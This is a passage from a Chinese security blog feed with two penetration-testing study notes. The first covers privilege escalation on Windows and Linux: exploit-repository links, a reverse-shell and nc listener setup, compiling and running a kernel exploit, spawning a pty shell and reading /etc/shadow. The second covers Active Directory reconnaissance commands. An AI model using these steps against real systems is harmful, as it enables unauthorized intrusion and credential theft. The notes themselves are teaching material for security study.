<content type="html"><![CDATA[<h2 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h2><p>Web权限获取: 插件应用, 数据库, 中间件, 网站源码后台获取… </p><p>网站前台: REC漏洞, 代码执行, 命令执行, 写文件, 写shell</p><h4 id="权限划分"><a href="#权限划分" class="headerlink" title="权限划分"></a>权限划分</h4><ul><li>Linux:<ul><li>管理员UID为0: 系统的管理员用户</li><li>系统用户UID为1~999</li><li>普通用户UID从1000开始</li></ul></li><li>Windows<ul><li>用户及组: system(相当于root) administrator user guest等</li></ul></li></ul><h4 id="具体的几种权限"><a href="#具体的几种权限" class="headerlink" title="具体的几种权限"></a>具体的几种权限</h4><ul><li>后台权限:<ul><li>获取方式: 爆破、注入猜解,弱口令等</li><li>⼀般网站或应用后台智能操作应用的界面内容, 数据图片等信息,无法操作程序的源代码或服务器上的资源文件</li><li>权限提取:<ul><li>通过账户密码等信息获取数据库等权限</li><li>通过文件编辑操作获取网站权限Webshell等</li></ul></li></ul></li><li>网站权限<ul><li>获取方式: 写文件等</li><li>查看或修改(还要看有没有锁权)程序源代码,可以进行网站或应用的配置文件读取(接口配置信息、数据库配置信息等),还能收集服务器操作系统等相关的信息,为后续系统提权做准备</li></ul></li><li>数据库权限<ul><li>获取方式: 源码或配置文件泄露, webshell进行配置文件读取等</li><li>操作数据库的权限,数据库的增删改查等</li><li>权限提取:<ul><li>获取敏感数据, 获取后台权限</li><li>写入文件, 获取webshell</li></ul></li></ul></li><li>接口权限<ul><li>获取方式: 后台(修改配置信息功能点),网站权限(查看配置文件获取)</li><li>邮件、短信、支付等功能接口</li></ul></li></ul><h3 id="Windows权限提升"><a href="#Windows权限提升" class="headerlink" title="Windows权限提升"></a>Windows权限提升</h3><h4 id="溢出漏洞"><a href="#溢出漏洞" class="headerlink" title="溢出漏洞"></a>溢出漏洞</h4><h5 id="操作前提"><a href="#操作前提" class="headerlink" title="操作前提"></a>操作前提</h5><ul><li>本地用户 当前计算机的某个用户</li><li>Web权限 当前计算机的web权限 建立在web权限已经取得的情况下进行权限提升</li></ul><h5 id="成功条件"><a href="#成功条件" class="headerlink" title="成功条件"></a>成功条件</h5><ul><li>符合的操作系统</li><li>符合的溢出漏洞</li></ul><h5 id="常见步骤"><a href="#常见步骤" class="headerlink" title="常见步骤"></a>常见步骤</h5><ol><li><p><strong>信息收集</strong></p><ul><li><p>收集: 操作系统版本, 漏洞补丁, 位数(32/64) 杀软防护, 网络, 当前用户权限 等信息</p></li><li><p>常用命令:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">ver</span></span><span class="line"><span style="color: #babed8">systeminfo</span></span><span class="line"><span style="color: #babed8">whoami</span></span><span class="line"><span style="color: #babed8">netstat -ano</span></span><span class="line"><span style="color: #babed8">tasklist /svc</span></span></code></pre></div></li></ul></li><li><p>基于补丁和系统版本 位数籁进行可用溢出漏洞EXP, 上传EXP调用执行去提权</p><ul><li><p>操作方式-<strong>推荐使用自动提权</strong>:</p><ul><li><p>基于手工操作</p></li><li><p>基于CS半自动提权</p></li><li><p>基于MSF全自动提权</p></li></ul></li><li><p>手工提取工具:</p><ul><li><a href="https://github.com/chroblert/WindowsVulnScan">WindowsVulnScan: 基于主机的漏洞扫描工具 (github.com)</a></li><li><a href="https://github.com/vulmon/Vulmap">Vulmap: 在线本地漏洞扫描器(github.com)</a></li><li><a href="https://github.com/bitsadmin/wesng">wesng:Windows 漏洞利用建议器 - 下一代 (github.com)</a></li><li><strong>网页</strong>:<a href="https://i.hacking8.com/tiquan">提权辅助网页 Windows提权辅助 (hacking8.com)</a></li></ul></li><li><p>寻找EXP利用 - 通过漏洞编号查找:</p><ul><li><strong>推</strong>:<a href="https://github.com/Ascotbe/Kernelhub">Ascotbe/Kernelhub: Linux、macOS、Windows 提权漏洞合集(github.com)</a></li><li><a href="https://gitlab.com/exploit-database/exploitdb">Exploit-DB / Exploits + Shellcode + GHDB · GitLab</a></li><li><a href="https://github.com/nomi-sec/PoC-in-GitHub">nomi-sec/PoC-in-GitHub:📡从 GitHub 自动收集 PoC。</a></li><li><a href="https://github.com/k8gege/Ladon">k8gege/Ladon: Ladon大型内网渗透工具</a></li></ul></li></ul></li></ol><h4 id="数据库"><a href="#数据库" class="headerlink" title="数据库"></a>数据库</h4><h4 id="第三方软件"><a href="#第三方软件" class="headerlink" title="第三方软件"></a>第三方软件</h4><h3 id="Linux提权"><a href="#Linux提权" class="headerlink" title="Linux提权"></a>Linux提权</h3><p>通常, 在拥有一个webshell的时候, 一般权限都是web权限, 权限较低, 只能执行一些命令, 如查看当前用户, 网络, ip信息等, 如果想进行内网渗透就需要将权限提到最高, 如系统权限, 超级管理员权限</p><h5 id="创建交互shell"><a href="#创建交互shell" class="headerlink" title="创建交互shell"></a>创建交互shell</h5><ul><li><p>linux提权需要交互shell</p></li><li><p>使用工具perl-reverse-shell.pl建立sockets, 本地可以使用nc监听端口<code>nc -vvip 1234</code></p></li></ul><h5 id="查看发行版"><a href="#查看发行版" class="headerlink" title="查看发行版"></a>查看发行版</h5><ul><li><p><code>cat /etc/issue</code></p></li><li><p><code>cat /etc/*release</code></p></li><li><p>查看内核版本<code>uname -a</code></p></li></ul><h5 id="查看可用的提权exp"><a href="#查看可用的提权exp" class="headerlink" title="查看可用的提权exp"></a>查看可用的提权exp</h5><ul><li><a href="https://www.exploit-db.com/">Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers (exploit-db.com)</a></li></ul><h5 id="进行提取"><a href="#进行提取" class="headerlink" title="进行提取"></a>进行提取</h5><ul><li><p>在目标机编译exp, 如果编译不成功在本地编译后上传到目标上<br><code>gcc exp.c -o exp</code></p></li><li><p>增加运行权限<br><code>chmod +x exp</code></p></li><li><p>运行exp</p></li><li><p>切换shell-><code>/bin/bash</code><br><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p></li><li><p>查询当前用户id</p></li><li><p>查询机密文件如<code>/etc/shadow</code></p></li></ul>]]></content>
<summary type="html"><h2 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h2><p>Web权限获取: 插件应用, 数据库, 中间件, 网站源码后台获取… </p>
<p>网站前台: REC漏洞, 代码执行, </summary>
</entry>
<entry>
<title>内网安全-信息收集</title>
<link href="https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86.html"/>
<id>https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86.html</id>
<published>2024-04-11T11:50:10.000Z</published>
<updated>2024-06-01T01:49:20.145Z</updated>
<content type="html"><![CDATA[<h2 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>内网信息收集</h2><h3 id="一-收集本机信息"><a href="#一-收集本机信息" class="headerlink" title="一.收集本机信息"></a>一.收集本机信息</h3><h4 id="判断是否有域"><a href="#判断是否有域" class="headerlink" title="判断是否有域"></a>判断是否有域</h4><ul><li><p><code>ipconfig /all</code> 在<code>Windows IP 配置</code>项下</p></li><li><p><code>Systeminfo</code> 在”域”词条下, 图中显示为WORKGROUP, 说明没有域<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-16%20162703.png?raw=true"></p></li><li><p><code>net time /domain</code></p><ul><li><p>存在域并且当前用户是域用户<br><img src="C:\Users\Myprefer\Desktop\640.jpg"></p></li><li><p>存在域,当前用户不是域用户<br>回显:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">发生系统错误 5</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">拒绝访问</span></span></code></pre></div></li><li><p>不存在域</p><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-17%20152845.png?raw=true"></p></li></ul></li></ul><h4 id="查看当前登录域"><a href="#查看当前登录域" class="headerlink" title="查看当前登录域"></a>查看当前登录域</h4><ul><li><p><code>net config workstation</code></p><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-17%20153107.png?raw=true"></p></li></ul><p>图中工作站域为workgroup, 则不存在域</p><ul><li><p>ping命令</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF; font-style: italic">for</span><span style="color: #BABED8"> /L %I in</span><span style="color: #89DDFF">(</span><span style="color: #FFCB6B">1,1,254</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> DO @ping -w 1 -n 1 192.168.110.%I </span><span style="color: #89DDFF">|</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">findstr</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">TTL=</span><span style="color: #89DDFF">"</span></span></code></pre></div></li><li><p>使用工具扫描探测</p><ul><li><p><strong>nbtscan</strong> - 一个在本地或远程TCP/IP网络上扫描开放的NETBIOS名称服务器的命令行工具</p><ul><li><p><a href="https://github.com/resurrecting-open-source-projects/nbtscan">resurrecting-open-source-projects/nbtscan: Scan networks searching for NetBIOS information (github.com)</a></p></li><li><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">用法:</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">nbtscan-unixwiz</span><span style="color: #BABED8"> [选项] 目标 </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">目标...</span><span style="color: #89DDFF">]</span></span><span class="line"></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">目标可以是IP地址,DNS名称或地址的列表范围。</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">范围可以表示成“192.168.12.0/24”或“192.168.12.64-97”</span></span><span class="line"></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">-V</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">显示版本信息</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">-f</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">显示完整的NBT资源记录响应</span><span style="color: #89DDFF">(</span><span style="color: #FFCB6B">推荐</span><span style="color: #89DDFF">)</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">-H</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">生成HTTP请求头</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">-v</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">开启详细输出调试</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">-n</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">不查找响应IP地址的反向名称</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">-p</span><span style="color: #BABED8"> </span><span style="color: #89DDFF"><</span><span style="color: #BABED8">n</span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">绑定UDP端口</span><span style="color: #89DDFF">(</span><span style="color: #FFCB6B">默认0</span><span style="color: #89DDFF">)</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">-m</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">响应中包含MAC地址</span><span style="color: #BABED8"> (等同</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">-f</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">)</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">-T</span><span style="color: #BABED8"> </span><span style="color: #89DDFF"><</span><span style="color: #BABED8">n</span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">超时不响应</span><span style="color: #BABED8"> (默认2秒)</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">-w</span><span style="color: #BABED8"> </span><span style="color: #89DDFF"><</span><span style="color: #BABED8">n</span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">次写入后等待秒数</span><span style="color: #BABED8"> (默认10ms)</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">-t</span><span style="color: #BABED8"> </span><span style="color: #89DDFF"><</span><span style="color: #BABED8">n</span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">每个地址尝试次数</span><span style="color: #89DDFF">(</span><span style="color: #FFCB6B">默认1次</span><span style="color: #89DDFF">)</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #FFCB6B">-P</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">以perl的hashref格式生成结果</span></span></code></pre></div></li></ul></li><li><p><strong>arp-scan</strong> - ARP扫描工具</p><ul><li>使用: <a href="https://blog.csdn.net/newbeixue/article/details/123111543">arp-scan使用-CSDN博客</a></li></ul></li></ul></li></ul><h4 id="域内端口扫描"><a href="#域内端口扫描" class="headerlink" title="域内端口扫描"></a>域内端口扫描</h4><ul><li><p><strong>telnet</strong> 命令扫描</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">telnet</span><span style="color: #BABED8"> </span><span style="color: #89DDFF"><</span><span style="color: #C3E88D">addres</span><span style="color: #BABED8">s</span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #89DDFF"><</span><span style="color: #C3E88D">por</span><span style="color: #BABED8">t</span><span style="color: #89DDFF">></span></span></code></pre></div></li><li><p><strong>metasploit</strong> 的端口扫描模块<br><a href="https://blog.csdn.net/weixin_44255856/article/details/97900038">渗透之metasploit技术-端口扫描,漏洞利用_search portscan-CSDN博客</a></p></li><li><p><strong>Nmap</strong></p></li></ul><h4 id="查找域控制器"><a href="#查找域控制器" class="headerlink" title="查找域控制器"></a>查找域控制器</h4><ul><li><code>net group "Domain Controllers" /domain</code></li><li><code>nltest /DCLIST:<域名></code></li><li><code>nslookup -type=SRV _LDAP._tcp</code></li><li><code>net time /domain</code></li><li><code>netdom query pdc</code></li></ul><h4 id="获取域内用户和管理员信息"><a href="#获取域内用户和管理员信息" class="headerlink" title="获取域内用户和管理员信息"></a>获取域内用户和管理员信息</h4><ul><li><p><strong>查询所有域用户列表</strong>:</p><ul><li><p><code>net user /domain</code></p></li><li><p><code>wmic useraccount get /all</code></p></li><li><p><code>dsquery user</code></p></li><li><p><code>net localgroup administrators /domain</code></p></li></ul></li><li><p><strong>查询域管理员用户组</strong>:</p><ul><li><code>net group "Enterprise Admains" /domain</code></li></ul></li><li><p><strong>定位域管理员</strong>:</p><ul><li><p><strong>PsLoggedon</strong> - <a href="https://blog.csdn.net/qq_44159028/article/details/115439633">定位域管理员_psloggedon-CSDN博客</a><br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-18%20105737.png?raw=true"></p></li><li><p><strong>AdFind</strong>- <a href="https://blog.csdn.net/weixin_43571641/article/details/124263803">域内信息查询工具AdFind_adfind download-CSDN博客</a></p></li><li><p><strong>PVEFindADUser</strong> - <a href="https://blog.csdn.net/qq_44159028/article/details/115439633">定位域管理员 PVEFindADUser-CSDN博客</a><br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-18%20110437.png?raw=true"></p></li></ul></li><li><p><strong>查找域管理进程</strong>:</p><ul><li><p>本机检查:</p><ul><li><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">net</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">group</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Domain Admins</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">/domain</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//获取域管理员列表</span></span></code></pre></div></li><li><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">tasklist</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/v</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">列出本机所有进程及进程用户</span></span></code></pre></div><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-18%20110732.png?raw=true"></p></li></ul></li></ul></li><li><p><strong>查询域控制器的域用户会话</strong>:</p><ul><li><p>收集域控制器的列表</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">net</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">group</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Domain Controllers</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">/domain</span></span></code></pre></div></li><li><p>收集域管理员列表</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">net</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">group</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Domain Admins</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">/domain</span></span></code></pre></div></li><li><p><strong>Netsess</strong><br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-18%20111100.png?raw=true"></p></li></ul></li><li><p><strong>扫描远程系统上运行的任务:</strong></p><ul><li><p>前提是目标使用了本地域管理员共享账户</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">FOR</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/F</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%i</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">in</span><span style="color: #BABED8"> (ips.txt) DO @echo </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">+</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> %i </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">@tasklist/V</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/S</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%i</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/U</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">user</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/P</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">password</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">2></span><span style="color: #C3E88D">NUL</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">output.txt</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">FOR</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/F</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%n</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">in</span><span style="color: #89DDFF">(</span><span style="color: #FFCB6B">names.txt</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">DO</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">@type</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">output.txt</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">|</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">findstr</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%n</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">NUL</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> [!] %nwas found running a process on %i && pause</span></span></code></pre></div></li></ul></li><li><p><strong>扫描远程系统上NetBIOS信息</strong>:</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF; font-style: italic">for</span><span style="color: #BABED8"> /F %i </span><span style="color: #89DDFF; font-style: italic">in</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #FFCB6B">ips.txt</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">do</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">@echo</span><span style="color: #BABED8"> [+] Checking %i </span><span style="color: #89DDFF">&&</span><span style="color: #FFCB6B">nbtstat</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-A</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%i</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">2></span><span style="color: #C3E88D">NUL</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #C3E88D">nbsessions.txt</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">FOR</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/F</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%n</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">in</span><span style="color: #BABED8"> (admins.txt)DO @type nbsessions.txt </span><span style="color: #89DDFF">|</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">findstr</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/I</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%n</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">NUL</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> [!] %n wasfound logged into %i</span></span></code></pre></div></li></ul><h4 id="利用PowerShell收集域内信息"><a href="#利用PowerShell收集域内信息" class="headerlink" title="利用PowerShell收集域内信息"></a>利用PowerShell收集域内信息</h4><h5 id="命令汇总"><a href="#命令汇总" class="headerlink" title="命令汇总"></a>命令汇总</h5><ul><li><p>域信息收集</p><div class="language-powershell"><button title="Copy code" class="copy"></button><span class="lang">powershell</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">net time </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看时间服务器</span></span><span class="line"><span style="color: #BABED8">net config workstation </span><span style="color: #676E95; font-style: italic">#查询当前登录域及登录用户信息</span></span><span class="line"><span style="color: #BABED8">net user </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查询域内用户</span></span><span class="line"><span style="color: #BABED8">wmic useraccount get </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">all </span><span style="color: #676E95; font-style: italic">#查询域内用户的详细信息</span></span><span class="line"><span style="color: #BABED8">net user xie </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看指定域用户xie的详细信息</span></span><span class="line"><span style="color: #BABED8">net view </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看有几个域</span></span><span class="line"><span style="color: #BABED8">net view </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain:xxx </span><span style="color: #676E95; font-style: italic">#查看域内的主机</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看域里面的组</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">domain users</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看域用户</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">domain controllers</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看域控制器</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">domain computers</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看域内所有的主机</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">domain admins</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看域管理员,该组内的成员对域控拥有完全控制权</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">enterprise admins</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看企业管理组,该组内的成员对域控拥有完全控制权</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">domain guest</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看域访客组,权限较低</span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8">nltest </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain_trusts </span><span style="color: #676E95; font-style: italic">#查看域信任信息</span></span><span class="line"><span style="color: #BABED8">net accounts </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查询域密码策略</span></span><span class="line"><span style="color: #BABED8">whoami </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">user </span><span style="color: #676E95; font-style: italic">#查看用户SID和域SID,如用户的SID是:S-1-5-21-2189311154-2766837956-1982445477-520 则域SID则是去掉最后的520:S-1-5-21-2189311154-2766837956-1982445477</span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8">以下命令只能在域控上查询</span></span><span class="line"><span style="color: #BABED8">dsquery user </span><span style="color: #676E95; font-style: italic">#查询目录中的用户</span></span><span class="line"><span style="color: #BABED8">dsquery computer </span><span style="color: #676E95; font-style: italic">#查询目录中的主机</span></span><span class="line"><span style="color: #BABED8">dsquery group </span><span style="color: #676E95; font-style: italic">#查询目录中的组.</span></span><span class="line"><span style="color: #BABED8">dsquery ou </span><span style="color: #676E95; font-style: italic">#查询目录中的组织单元.</span></span><span class="line"><span style="color: #BABED8">dsquery site </span><span style="color: #676E95; font-style: italic">#查询目录中的站点</span></span><span class="line"><span style="color: #BABED8">dsquery server </span><span style="color: #676E95; font-style: italic">#查询域控</span></span><span class="line"><span style="color: #BABED8">dsquery contact </span><span style="color: #676E95; font-style: italic">#查询目录中的联系人</span></span><span class="line"><span style="color: #BABED8">dsquery subnet </span><span style="color: #676E95; font-style: italic">#查询目录中的子网</span></span><span class="line"><span style="color: #BABED8">dsquery quota </span><span style="color: #676E95; font-style: italic">#查询目录中的配额规定.</span></span><span class="line"><span style="color: #BABED8">dsquery partition </span><span style="color: #676E95; font-style: italic">#查询目录中的分区.</span></span><span class="line"><span style="color: #BABED8">dsquery </span><span style="color: #89DDFF">*</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">#用通用的LDAP查询来查找目录中的任何对 </span></span><span class="line"><span style="color: #BABED8">dsquery server –domain </span><span style="color: #82AAFF">xie.com</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">|</span><span style="color: #BABED8"> dsget server–dnsname –site </span><span style="color: #676E95; font-style: italic">#搜索域内域控制器的DNS主机名和站点名</span></span><span class="line"><span style="color: #BABED8">dsquery computer domainroot –name </span><span style="color: #89DDFF">-</span><span style="color: #BABED8">xp –limit </span><span style="color: #F78C6C">10</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">#搜索域内以-xp结尾的机器10台</span></span><span class="line"><span style="color: #BABED8">dsquery user domainroot –name admin </span><span style="color: #89DDFF">-</span><span style="color: #BABED8">limit </span><span style="color: #676E95; font-style: italic">#搜索域内以admin开头的用户10个</span></span></code></pre></div></li><li><p>查询域控的主机名</p><div class="language-powershell"><button title="Copy code" class="copy"></button><span class="lang">powershell</span><pre class="shiki 